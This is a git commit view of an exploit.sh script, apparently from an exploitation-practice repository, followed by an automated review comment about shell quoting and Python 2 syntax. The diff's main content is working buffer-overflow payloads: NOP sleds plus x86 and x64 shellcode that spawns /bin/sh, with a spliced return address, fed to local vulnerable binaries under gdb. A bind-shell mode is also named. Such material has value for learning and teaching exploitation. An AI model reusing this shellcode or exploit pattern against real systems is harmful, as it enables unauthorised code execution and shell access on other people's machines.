author | Toni Uhlig <matzeton@googlemail.com> | 2018-07-11 10:19:46 +0200 |
---|---|---|
committer | Toni Uhlig <matzeton@googlemail.com> | 2018-07-11 10:19:46 +0200 |
commit | d3706047194005ce1cb97c2909f25bd1877115f1 (patch) | |
tree | 7dcca9752a891e8feb068d8a600884d0c7948d73 /exploit.sh | |
parent | 71e27ae1766e0090fa989aad7ee930152a1921de (diff) |
improvements
Signed-off-by: Toni Uhlig <matzeton@googlemail.com>
Diffstat (limited to 'exploit.sh')
-rwxr-xr-x | exploit.sh | 4 |
1 files changed, 2 insertions, 2 deletions
@@ -67,14 +67,14 @@ if [ "$1" = "local32" ]; then # NOPsled(158) + shellcode(70) + NOPsled(117) + return_addr(4) # uses own shellcode: shellcode/hello.asm (x86-nasm) echo "$0: using return adr: ${RETURN_ADR_OVERFLOW32}" - ./overflow $(python -c 'print "\x90"*158 + "\x31\xc0\x31\xdb\x31\xc9\x99\xeb\x08\x5b\x88\x43\x07\xb0\x0b\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x90"*117 +"'${RETURN_ADR_OVERFLOW32}'"') + gdb -ex r --args ./overflow $(python -c 'print "\x90"*158 + "\x31\xc0\x31\xdb\x31\xc9\x99\xeb\x08\x5b\x88\x43\x07\xb0\x0b\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x90"*117 +"'${RETURN_ADR_OVERFLOW32}'"') elif [ "$1" = "local64" ]; then # NOPsled(133) + shellcode(34) + NOPsled(145) + return_addr(8) # uses own shellcode: shellcode/execve_x64.o echo "$0: using return adr: ${RETURN_ADR_OVERFLOW64}" - gdb -batch -ex 'run' --args ./overflow_x64 $(python -c 'print "\x90"*133 + "\xeb\x13\x48\x31\xc0\x5f\x88\x47\x07\x57\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff" + "\x90"*145 + "'${RETURN_ADR_OVERFLOW64}'"') + gdb -ex r --args ./overflow_x64 $(python -c 'print "\x90"*133 + "\xeb\x13\x48\x31\xc0\x5f\x88\x47\x07\x57\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff" + "\x90"*145 + "'${RETURN_ADR_OVERFLOW64}'"') elif [ "$1" = "bind32" ]; then |
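Review bot: Both added `gdb -ex r --args …` lines still pass the payload through an unquoted `$(python -c '…')`, so the single argument given to `./overflow` and `./overflow_x64` is subject to word splitting and globbing; the byte strings visible here contain nothing in the default IFS, but any space, tab or newline byte produced by the Python expression (including one introduced through the spliced return address) would silently turn it into several arguments, so quote it as `"$(python -c '…')"`. The `print "…"` form is Python 2 statement syntax, so these lines only work where `python` resolves to Python 2; calling `python2` explicitly or stating the requirement in the `# uses own shellcode:` comment above each line would make that dependency visible. `RETURN_ADR_OVERFLOW32` and `RETURN_ADR_OVERFLOW64` are inserted into the Python source via a single-quote break (`"'${RETURN_ADR_OVERFLOW32}'"`), so a quote or backslash in either variable alters the program text rather than the payload; where they are assigned is outside this hunk, as are the start and end of the enclosing `if`/`elif` chain.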